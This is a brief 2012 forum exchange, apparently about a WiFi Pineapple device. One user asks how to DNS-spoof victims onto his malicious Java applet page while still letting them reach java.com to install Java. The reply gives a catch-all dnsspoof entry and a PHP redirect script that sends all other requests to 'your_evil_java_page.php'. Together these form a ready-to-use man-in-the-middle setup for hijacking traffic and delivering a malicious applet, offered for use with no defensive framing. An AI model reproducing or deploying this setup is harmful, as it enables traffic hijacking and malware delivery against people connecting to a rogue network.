AlbinoWookie Posted August 24, 2012 Share Posted August 24, 2012 I was wondering how i would go about configuring the dns spoofer to spoof everything to my java applet page except for the java website.? So if the person doesn't have java installed prier, they are able to be redirected to http://www.java.com/en/download/ and are able to download and install it. Quote Link to comment Share on other sites More sharing options...
amoeba Posted August 24, 2012 Share Posted August 24, 2012 Have you tried redirecting everything to your pineapple, in dnsspoof configuration 172.16.42.1 *[/CODE]An then edit redirect.php like this[CODE]<?php$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "java")) { header('Location: http://www.java.com/en/download/'); } require('your_evil_java_page.php');?>[/CODE] Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.